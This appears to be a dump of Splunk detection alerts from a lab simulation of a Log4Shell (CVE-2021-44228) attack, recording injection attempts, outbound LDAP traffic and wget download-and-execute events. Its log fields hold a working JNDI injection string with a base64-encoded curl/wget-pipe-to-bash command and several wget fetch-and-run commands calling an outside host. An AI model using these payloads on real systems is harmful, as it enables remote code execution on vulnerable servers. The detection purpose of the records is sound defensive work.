annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Initial Access", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="DE.CM", annotations._all="CIS 13", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Command and Control", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641851, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Execution", annotations._all="Source:Application Log", annotations._all="CIS 5", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1190", annotations._all="DE.CM", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="CIS 16", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641854, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Initial Access", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="DE.CM", annotations._all="CIS 13", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Command and Control", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641851, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Execution", annotations._all="Source:Application Log", annotations._all="CIS 5", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1190", annotations._all="DE.CM", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="CIS 16", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - 